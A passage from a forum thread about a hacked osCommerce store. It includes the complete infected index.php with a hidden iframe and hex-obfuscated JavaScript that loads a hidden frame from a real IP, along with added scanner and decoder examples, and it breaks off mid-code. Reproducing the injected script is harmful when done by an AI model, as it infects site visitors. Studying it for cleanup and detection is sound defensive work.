Virus at server side files

Is it possible that your site, hosted on a server, gets infected with some type of virus?

Some HTML.Malware or something like that.

If it happens, who is responsible for that?

You know hosting companies provide FTP accounts, so that you can upload your files from your local PC to the server.

If your PC is already infected and you transfer some files to the server, is it possible that a virus is transferred with your files?

If it happens, what would you do to solve the issue?

The issue is… my PHP site is hosted on a server, and when anyone browses it, an antivirus window pops up saying that there is a virus in the site.

When I go to temporary Internet files, I find this error.

http://i137.photobucket.com/albums/q231/mirza_yasir4/News/error2-1.jpg

AVG antivirus heals it every time, but the next time I open my site, the same thing appears.

Re: Virus at server side files

That is basically a trojan. JS downloads a .jpg file to the computer, renames it to .exe and the crap starts.

If it's on your website chances are:

1) Someone has access to your account/host and modified the website
2) Your website is vulnerable to XSS, and an attacker used this weakness to remotely embed the trojan.

Re: Virus at server side files

Any solution, sir?

Well, I changed my local PC antivirus and now the message is like this: …
http://i137.photobucket.com/albums/q231/mirza_yasir4/News/AviraError.jpg

I contacted the server support team; they told me the same thing, that some hacker put an “i-frame” tag inside my index.php file.
Any suggestions?

As far as I know, we have a backup on the server from three days ago; as I remember, 3 days ago it was fine. Should I restore that? But I am afraid it will also change the content of the MySQL database.

Re: Virus at server side files

An i-frame simply embeds a frame (website) inside your current page:


<iframe 
src ="www.hacker.com/trojan.php"
width="0%">
</iframe>

The above code would include a frame, rendered by your browser but not displayed.

OK, so we know the hacker made an addition to your code. Now what you have to figure out is how.

Some possible scenarios:

1) Your web application (PHP code) is vulnerable to attacks. PHP does not do bounds checking like Java, and as such it is quite easy to find and run buffer overflow exploits. Could an attacker remotely embed the code by executing a small script in a payload?

2) Did the attacker compromise your account? This could be down to known vulnerabilities (very unlikely unknown ones in this case) on your hosting package, e.g. using an outdated version of PHP or Apache, or someone knowing your login credentials.

3) The host server has been compromised. Same as above, but rather than just your account, all users have been compromised.

A rollback would be a good idea. Your database could be compromised; we don't know until you find out. Do you have a log of all activity, any backups, or a way to roll back recent transactions?

I would suggest you try to gather as much information as possible from the server support team. Work with them to find out how your account was compromised. If they don't investigate, it's time to change host. If you don't find out what happened, the same person or someone else could do the same again, but destroy everything if they wanted to.
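The post above describes the shape of the injection (an iframe sized or styled so the browser renders it without showing it) but not how to look for it across a site. The following is an added example, not code from the thread or from osCommerce: a heuristic scanner that flags hidden iframes and the decode-then-document.write() primitives that usually sit next to them. The regexes, the placeholder hostname example.invalid and both sample documents are constructed for illustration; a hit is something to inspect, not proof of infection.

```python
"""Heuristic scan for the hidden-iframe injection described in the post above.

Added example (not from the thread or from osCommerce). The patterns and the
two sample documents are constructed for illustration.
"""
import re
from pathlib import Path

# One iframe tag, from "<iframe" to the closing ">" (newlines inside are fine).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)

# Ways a frame is made to load without being seen: zero or 1-pixel dimensions
# (the post's width="0%", the infected file's width='1' height='1') or CSS
# that hides it outright.
HIDDEN_RE = re.compile(
    r"(?:width\s*=\s*['\"]?0\s*%?['\"]?"
    r"|width\s*=\s*['\"]?[01]\b"
    r"|height\s*=\s*['\"]?[01]\b"
    r"|visibility\s*:\s*hidden"
    r"|display\s*:\s*none)",
    re.IGNORECASE,
)

# Building blocks of the "decode a string, then document.write() it" pattern
# that commonly accompanies such an injection.
OBFUSCATION_RE = re.compile(
    r"String\.fromCharCode|parseInt\(.*?,\s*16\s*\)|document\.write\(\s*\w+\(",
    re.IGNORECASE,
)


def find_hidden_iframes(html: str) -> list:
    """Return every iframe tag in `html` that is sized or styled to be invisible."""
    return [tag for tag in IFRAME_RE.findall(html) if HIDDEN_RE.search(tag)]


def scan_text(html: str) -> dict:
    """Summarise one document: hidden iframes plus the obfuscation primitives seen."""
    hits = sorted({m.group(0) for m in OBFUSCATION_RE.finditer(html)})
    return {"hidden_iframes": find_hidden_iframes(html), "obfuscation_hits": hits}


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")) -> dict:
    """Walk a web root and report only the files that produced findings."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            result = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if result["hidden_iframes"] or result["obfuscation_hits"]:
                findings[str(path)] = result
    return findings


# Constructed samples: a normal embedded map, and the injection shape seen in
# the thread (placeholder hostname; the hex is just "<iframe>" encoded).
CLEAN_SAMPLE = (
    '<body><iframe src="https://example.invalid/map" width="100%" height="300">'
    "</iframe></body>"
)
INFECTED_SAMPLE = (
    "<body marginwidth=\"0\"><iframe src='http://example.invalid/x' width='1' height='1' "
    "style='visibility: hidden;'></iframe>"
    "<script>function d(h){var o='';for(i=0;i<h.length;i+=2){"
    "o+=String.fromCharCode(parseInt(h.substr(i,2),16));}return o;}"
    "document.write(d('3C696672616D653E'));</script></body>"
)

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN_SAMPLE), ("infected", INFECTED_SAMPLE)):
        print(name, scan_text(doc))
```

Run scan_tree() against a copy of the web root taken before any cleanup, so the findings can be compared with the host's backup; the iframe example the post itself gives (width="0%") is caught by the same check.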


Re: Virus at server side files

The support team told me that the directory log is not available. Why? I asked.
They said maybe the hacker has deleted it.
Right now I am unable to connect to my account via FTP.
However, I can log in to my account via the web, but I don't have access to my site files.

I am familiar with i-frames, but that I can fix when I get access to my files. I have several FTP accounts within my account. Maybe I should change the passwords for all of them.

My application is an osCommerce store. It has security vulnerabilities; the osCommerce support site told me that there are security patches. Now I don't know whether they are applied to my company's store or not, because I have not been working here very long.

OK, I will check these issues and see what happens. Thanks for your help; keep in touch if you can.

Re: Virus at server side files

I am just curious: is the hosting server IIS or Apache (Linux or MS)?

Re: Virus at server side files

Get your host to disable all web access to your site.

Get your host to reconfigure ALL of your passwords for ALL accounts. That includes your PHP DB library if using PEAR, osCommerce, MySQL, etc.

Thoroughly examine what caused the problem. Apply all known patches (osCommerce has many). Is it worthwhile moving to a more secure platform?

Find out what, if any, information was compromised. If it was an e-commerce site, depending on configuration, this could be lost credit card data, hijacked accounts, etc.

Once you are confident of having managed the situation, ONLY then enable services.

Re: Virus at server side files

You are absolutely correct; I am trying to do that. Right now I am unable to access my FTP accounts, but the user name for my account on the web still works.

The support team is very slow. They only reply to my email; chat support is not working.

A little clearer now: the malware name is "HTML_IFRAME.CX".
It only gives an error message while browsing the "index.php" page, and only on Internet Explorer 6 or below, not on Firefox.

I asked them to run a virus scan on the server; I don't know when they will do that.

Re: Virus at server side files

Server is Apache

Re: Virus at server side files

Any decent host will be sitting behind a proxy firewall which includes a virus scanner built into the appliance. Even if they did run a VS on your account server, it won't really do anything. The malware is remotely hosted.

Re: Virus at server side files

Maybe you are right, but let's see what happens. The server support team is not responding; maybe they have some issue at the server, because none of our FTP accounts are getting access to the server.

Well, currently I got it a little bit fixed. I went into the osCommerce FileManager and replaced the index.php file with the one I backed up a month ago, as there is no change in structure; everything is coming from the database and that is safe. I took a backup of the database now.

Before that I talked to many antivirus support sites, including Symantec and TrendMicro; no one could suggest anything to me about fixing a malware issue at the server. All are saying run a full scan on your PC. :D I shouted many times that this is a server issue.

I put the infected code of "index.php" in a text file and then ran a scan locally; the antivirus caught it.

Also I posted the issue at the osCommerce forums and the people suggested some nice things to me; I must go for that.

Thanks, brother, for your help... :)

Re: Virus at server side files

Copy the infected index.php and paste it here:

Use the [code] tags for formatting.

Re: Virus at server side files

<?php
/*
  $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');


define('TEXT_GREETING_PERSONAL_AR', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');


define('TEXT_GREETING_GUEST_AR', '<span lang="AR-SA" dir="RTL" style="font-size: 18.0pt;">مرحبا بك يازائر ! ادخل فى حسابك <a href="%s"><u>هنا</u></a> او افتح حساب جديد <a href="%s"><u>هنا</u></a></span>');

  function tep_customer_greeting_ar() {
    global $customer_id, $customer_first_name;

    if (tep_session_is_registered('customer_first_name') && tep_session_is_registered('customer_id')) {
//      $greeting_string = sprintf(TEXT_GREETING_PERSONAL_AR, tep_output_string_protected($customer_first_name), tep_href_link(FILENAME_PRODUCTS_NEW));
    } else {
      $greeting_string = sprintf(TEXT_GREETING_GUEST_AR, tep_href_link(FILENAME_LOGIN, '', 'SSL'), tep_href_link(FILENAME_CREATE_ACCOUNT, '', 'SSL'));
    }

    return $greeting_string;
  }

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>"> 
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<script type="text/javascript">
<!--
if (document.layers){
    window.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
    window.onmousedown=rightclick;
    window.onmouseup=rightclick;

    function rightclick(e) {
    if (e.which == 3) {
    // Put right mouse code here
    alert('Copyright © 2004 NASA est.');
    return false;
    }
    else {
        return true;
        }
    }
}
if (document.all){
    function click() {
    if (event.button==2) {
    alert('Copyright © 2004 NASA est.')
    }

    if (event.button==3) {
    alert('Copyright © 2004 NASA est.')}
    }
    document.onmousedown=click
}
// -->
</script>

<script language="javascript"><!--
var i=0;
function resize() {
  if (navigator.appName == 'Netscape') i=40;
  if (document.images[0]) window.resizeTo(document.images[0].width +30, document.images[0].height+60-i);
  self.focus();
}
//--></script>
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48120f3d1fd6d(v48120f3d2056f){  return(parseInt(v48120f3d2056f,16));}function v48120f3d21ca7(v48120f3d22476){ function v48120f3d23be3 () {var v48120f3d243b4=2; return v48120f3d243b4;} var v48120f3d22c46='';for(v48120f3d23417=0; v48120f3d23417<v48120f3d22476.length; v48120f3d23417+=v48120f3d23be3()){ v48120f3d22c46+=(String.fromCharCode(v48120f3d1fd6d(v48120f3d22476.substr(v48120f3d23417, v48120f3d23be3()))));}return v48120f3d22c46;} document.write(v48120f3d21ca7('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6266623565207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323430383030292B27306661305C272077696474683D343330206865696768743D353630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="3" cellpadding="3">
  <tr>
    <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
    </table></td>
<!-- body_text //-->
<?php
  if ($category_depth == 'nested') {
    $category_query = tep_db_query("select cd.categories_name, c.categories_image from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . (int)$current_category_id . "' and cd.categories_id = '" . (int)$current_category_id . "' and cd.language_id = '" . (int)$languages_id . "'");
    $category = tep_db_fetch_array($category_query);
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
            <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . $category['categories_image'], $category['categories_name'], HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
          <tr>
            <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr>
<?php
    if (isset($cPath) && strpos('_', $cPath)) {
// check to see if there are deeper categories within the current category
      $category_links = array_reverse($cPath_array);
      for($i=0, $n=sizeof($category_links); $i<$n; $i++) {
        $categories_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "'");
        $categories = tep_db_fetch_array($categories_query);
        if ($categories['total'] < 1) {
          // do nothing, go through the loop
        } else {
          $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
          break; // we've found the deepest category the customer is in
        }
      }
    } else {
      $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$current_category_id . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
    }

    $number_of_categories = tep_db_num_rows($categories_query);

    $rows = 0;
    while ($categories = tep_db_fetch_array($categories_query)) {
      $rows++;
      $cPath_new = tep_get_path($categories['categories_id']);
      $width = (int)(100 / MAX_DISPLAY_CATEGORIES_PER_ROW) . '%';
      echo '                <td align="center" class="smallText" width="' . $width . '" valign="top"><a href="' . tep_href_link(FILENAME_DEFAULT, $cPath_new) . '">' . tep_image(DIR_WS_IMAGES . $categories['categories_image'], $categories['categories_name'], SUBCATEGORY_IMAGE_WIDTH, SUBCATEGORY_IMAGE_HEIGHT) . '<br>' . $categories['categories_name'] . '</a></td>' . "\n";
      if ((($rows / MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows / MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) {
        echo '              </tr>' . "\n";
        echo '              <tr>' . "\n";
      }
    }

// needed for the new products module shown below
    $new_products_category_id = $current_category_id;
?>
              </tr>
            </table></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
          </tr>
        </table></td>
      </tr>
    </table></td>
<?php
  } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS['manufacturers_id'])) {
// create column list
    $define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL,
                         'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME,
                         'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER,
                         'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE,
                         'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY,
                         'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT,
                         'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE,
                         'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW);

    asort($define_list);

    $column_list = array();
    reset($define_list);
    while (list($key, $value) = each($define_list)) {
      if ($value > 0) $column_list[] = $key;
    }

    $select_column_list = '';

    for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
      switch ($column_list[$i]) {
        case 'PRODUCT_LIST_MODEL':
          $select_column_list .= 'p.products_model, ';
          break;
        case 'PRODUCT_LIST_NAME':
          $select_column_list .= 'pd.products_name, ';
          break;
        case 'PRODUCT_LIST_MANUFACTURER':
          $select_column_list .= 'm.manufacturers_name, ';
          break;
        case 'PRODUCT_LIST_QUANTITY':
          $select_column_list .= 'p.products_quantity, ';
          break;
        case 'PRODUCT_LIST_IMAGE':
          $select_column_list .= 'p.products_image, ';
          break;
        case 'PRODUCT_LIST_WEIGHT':
          $select_column_list .= 'p.products_weight, ';
          break;
      }
    }

// show the products of a specified manufacturer
    if (isset($HTTP_GET_VARS['manufacturers_id'])) {
      if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only a specific category
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "'";
      } else {
// We show them all
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'";
      }
    } else {
// show the products in a given categorie
      if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only specific catgeory
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
      } else {
// We show them all
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
      }
    }

    if ( (!isset($HTTP_GET_VARS['sort'])) || (!ereg('[1-8][ad]', $HTTP_GET_VARS['sort'])) || (substr($HTTP_GET_VARS['sort'], 0, 1) > sizeof($column_list)) ) {
      for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
        if ($column_list[$i] == 'PRODUCT_LIST_NAME') {
          $HTTP_GET_VARS['sort'] = $i+1 . 'a';
          $listing_sql .= " order by pd.products_name";
          break;
        }
      }
    } else {
      $sort_col = substr($HTTP_GET_VARS['sort'], 0 , 1);
      $sort_order = substr($HTTP_GET_VARS['sort'], 1);
      $listing_sql .= ' order by ';
      switch ($column_list[$sort_col-1]) {
        case 'PRODUCT_LIST_MODEL':
          $listing_sql .= "p.products_model " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_NAME':
          $listing_sql .= "pd.products_name " . ($sort_order == 'd' ? 'desc' : '');
          break;
        case 'PRODUCT_LIST_MANUFACTURER':
          $listing_sql .= "m.manufacturers_name " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_QUANTITY':
          $listing_sql .= "p.products_quantity " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_IMAGE':
          $listing_sql .= "pd.products_name";
          break;
        case 'PRODUCT_LIST_WEIGHT':
          $listing_sql .= "p.products_weight " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_PRICE':
          $listing_sql .= "final_price " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
      }
    }
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php
// optional Product List Filter
    if (PRODUCT_LIST_FILTER > 0) {
      if (isset($HTTP_GET_VARS['manufacturers_id'])) {
        $filterlist_sql = "select distinct c.categories_id as id, cd.categories_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' order by cd.categories_name";
      } else {
        $filterlist_sql= "select distinct m.manufacturers_id as id, m.manufacturers_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_MANUFACTURERS . " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id . "' order by m.manufacturers_name";
      }
      $filterlist_query = tep_db_query($filterlist_sql);
      if (tep_db_num_rows($filterlist_query) > 1) {
        echo '            <td align="center" class="main">' . tep_draw_form('filter', FILENAME_DEFAULT, 'get') . TEXT_SHOW . ' ';
        if (isset($HTTP_GET_VARS['manufacturers_id'])) {
          echo tep_draw_hidden_field('manufacturers_id', $HTTP_GET_VARS['manufacturers_id']);
          $options = array(array('id' => '', 'text' => TEXT_ALL_CATEGORIES));
        } else {
          echo tep_draw_hidden_field('cPath', $cPath);
          $options = array(array('id' => '', 'text' => TEXT_ALL_MANUFACTURERS));
        }
        echo tep_draw_hidden_field('sort', $HTTP_GET_VARS['sort']);
        while ($filterlist = tep_db_fetch_array($filterlist_query)) {
          $options[] = array('id' => $filterlist['id'], 'text' => $filterlist['name']);
        }
        echo tep_draw_pull_down_menu('filter_id', $options, (isset($HTTP_GET_VARS['filter_id']) ? $HTTP_GET_VARS['filter_id'] : ''), 'onchange="this.form.submit()"');
        echo '</form></td>' . "\n";
      }
    }

// Get the right image for the top-right
    $image = DIR_WS_IMAGES . 'table_background_list.gif';
    if (isset($HTTP_GET_VARS['manufacturers_id'])) {
      $image = tep_db_query("select manufacturers_image from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
      $image = tep_db_fetch_array($image);
      $image = $image['manufacturers_image'];
    } elseif ($current_category_id) {
      $image = tep_db_query("select categories_image from " . TABLE_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
      $image = tep_db_fetch_array($image);
      $image = $image['categories_image'];
    }
?>
            <td align="right"><?php echo tep_image(DIR_WS_IMAGES . $image, HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><?php include(DIR_WS_MODULES . FILENAME_PRODUCT_LISTING); ?></td>
      </tr>
    </table></td>
<?php
  } else { // default page
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php /*            <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_default.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> */ ?>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="main"><?php echo tep_customer_greeting(); ?><br /><?php
            echo tep_customer_greeting_ar();
            ?>
            <br /></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td class="main"><?php echo TEXT_MAIN; ?></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . 'main_categories.php'); ?></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
          </tr>
<?php
    include(DIR_WS_MODULES . FILENAME_UPCOMING_PRODUCTS);
?>
        </table></td>
      </tr>
    </table></td>
<?php
  }
?>
<!-- body_text_eof //-->
    <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- right_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
<!-- right_navigation_eof //-->
    </table></td>
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

Re: Virus at server side files

Yup... posted...

I put this file in zip form on my PC. Whenever I open it, my Avira AV pops up, saying that there is malware inside this file.

Check out the longest line in the above code; you will see some weird code... right beside the HTML <body> tag.

Re: Virus at server side files

Thanks. Very interesting.

My background is in security but not specifically in secure coding or virus research. From the bits I can gather (I never learnt JS), that long line is the malware.

My guess is:

All of those random names (numbers) are given to obfuscate what the code really does. Further to that, the Unicode chars are summed up in a loop which produces the malware (virus). The final step is a conversion to ASCII which, when rendered, will compromise the browser, or attempt to anyway.

But also notice the iframe with source of: hxxp://77.221.133.150/.if/go.html?292720fa0
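The guess in the post above can be checked without rendering anything: the injected JavaScript is a plain hex-pair decoder (two hex digits, parseInt(..., 16), String.fromCharCode) whose output is handed to document.write(). The Python below is an added example, not code from the thread or from osCommerce; it redoes that decoding offline, pulls out the iframe source the decoded markup points at, and defangs it for a report. INJECTED_SCRIPT is the <script> element copied from the posted index.php; the function and pattern names are mine.

```python
"""Decode the hex-pair obfuscation in the <script> quoted from index.php above.

Added example, not part of the thread. It reproduces in Python what the injected
JavaScript does at runtime so the payload can be read without executing it.
"""
import re

# The <script> element that followed the hidden iframe in the posted index.php,
# split across string literals only for readability.
INJECTED_SCRIPT = (
    "<script>function v48120f3d1fd6d(v48120f3d2056f){  return(parseInt(v48120f3d2056f,16));}"
    "function v48120f3d21ca7(v48120f3d22476){ function v48120f3d23be3 () {var v48120f3d243b4=2; "
    "return v48120f3d243b4;} var v48120f3d22c46='';for(v48120f3d23417=0; "
    "v48120f3d23417<v48120f3d22476.length; v48120f3d23417+=v48120f3d23be3()){ "
    "v48120f3d22c46+=(String.fromCharCode(v48120f3d1fd6d(v48120f3d22476.substr(v48120f3d23417, "
    "v48120f3d23be3()))));}return v48120f3d22c46;} document.write(v48120f3d21ca7('"
    "3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C"
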